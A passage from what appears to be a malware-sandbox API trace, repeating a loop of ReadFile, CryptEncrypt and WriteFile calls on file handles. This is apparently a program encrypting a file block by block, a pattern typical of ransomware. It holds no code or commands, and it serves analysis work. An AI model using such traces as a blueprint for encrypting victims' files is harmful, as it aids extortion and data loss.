lpOverlapped=0x0) returned 1 [0143.374] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.374] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.374] GetLastError () returned 0x0 [0143.374] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.374] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.374] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.374] GetLastError () returned 0x0 [0143.374] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.374] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.374] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.374] GetLastError () returned 0x0 [0143.374] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.374] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.374] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.374] GetLastError () returned 0x0 [0143.374] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.374] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.374] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.374] GetLastError () returned 0x0 [0143.374] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.374] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.375] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.375] GetLastError () returned 0x0 [0143.375] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.375] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.375] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.375] GetLastError () returned 0x0 [0143.375] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.375] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.375] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.375] GetLastError () returned 0x0 [0143.375] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.375] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.375] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.375] GetLastError () returned 0x0 [0143.375] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.375] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.375] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.375] GetLastError () returned 0x0 [0143.375] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.375] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.375] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.375] GetLastError () returned 0x0 [0143.375] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.375] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.375] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.375] GetLastError () returned 0x0 [0143.375] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.375] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.376] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.376] GetLastError () returned 0x0 [0143.376] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.376] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.376] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.376] GetLastError () returned 0x0 [0143.376] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.376] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.376] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.376] GetLastError () returned 0x0 [0143.376] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.376] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.376] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.376] GetLastError () returned 0x0 [0143.376] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.376] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.376] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.376] GetLastError () returned 0x0 [0143.376] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.376] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.376] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.376] GetLastError () returned 0x0 [0143.376] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.376] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.376] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.376] GetLastError () returned 0x0 [0143.377] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.377] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.377] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.377] GetLastError () returned 0x0 [0143.377] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.377] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.377] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.377] GetLastError () returned 0x0 [0143.377] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.377] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.377] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.377] GetLastError () returned 0x0 [0143.377] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.377] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.377] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.377] GetLastError () returned 0x0 [0143.377] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.377] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.377] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.377] GetLastError () returned 0x0 [0143.377] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.377] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.377] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.377] GetLastError () returned 0x0 [0143.378] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.378] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.378] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.378] GetLastError () returned 0x0 [0143.378] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.378] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.378] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.378] GetLastError () returned 0x0 [0143.378] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.378] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.378] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.378] GetLastError () returned 0x0 [0143.378] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.378] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.378] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.378] GetLastError () returned 0x0 [0143.378] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.378] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.378] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.378] GetLastError () returned 0x0 [0143.378] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.378] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.378] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.378] GetLastError () returned 0x0 [0143.378] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.378] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.379] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.379] GetLastError () returned 0x0 [0143.379] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.379] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.379] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, 